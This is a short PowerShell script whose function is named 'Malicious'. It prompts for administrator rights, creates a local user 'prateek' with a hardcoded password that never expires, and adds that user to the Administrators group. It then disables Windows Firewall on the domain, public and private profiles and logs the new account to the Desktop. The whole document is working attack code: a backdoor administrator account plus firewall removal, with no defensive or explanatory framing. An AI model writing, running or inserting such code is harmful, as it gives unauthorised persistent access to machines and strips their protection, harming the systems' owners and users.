Function Malicious {#Get current user context $CurrentUser = New-Object Secur

1. Function Malicious {
2. #Get current user context
3. $CurrentUser = New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent())
4.  
5. #Check user is running the script is member of Administrator Group
6. if($CurrentUser.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator))
7. {
8. Write-host "Script is running with Administrator privileges!"
9. }
10. else
11. {
12. #Create a new Elevated process to Start PowerShell
13. $ElevatedProcess = New-Object System.Diagnostics.ProcessStartInfo "PowerShell";
14.  
15. # Specify the current script path and name as a parameter
16. $ElevatedProcess.Arguments = "& '" + $script:MyInvocation.MyCommand.Path + "'"
17.  
18. #Set the Process to elevated
19. $ElevatedProcess.Verb = "runas"
20.  
21. #Start the new elevated process
22. [System.Diagnostics.Process]::Start($ElevatedProcess)
23.  
24. #Exit from the current, unelevated, process
25. Exit
26.  
27. }
28.  
29. $Username = "prateek"
30. $Password = "password"
31. $group = "Administrators"
32.  
33. $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
34. $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
35.  
36. if ($existing -eq $null) {
37.  
38. Write-Host "Creating new local user $Username."
39. & NET USER $Username $Password /add /y /expires:never
40.  
41. Write-Host "Adding local user $Username to $group."
42. & NET LOCALGROUP $group $Username /add
43.  
44. }
45. else {
46. Write-Host "Setting password for existing local user $Username."
47. $existing.SetPassword($Password)
48. }
49.  
50. Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
51.  
52.  
53. $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq 'prateek' }
54.  
55. if($existing){
56. $existing | Out-File $env:USERPROFILE\Desktop\priv2.log -Verbose
57. }
58.  
59. }
60.  
61. malicious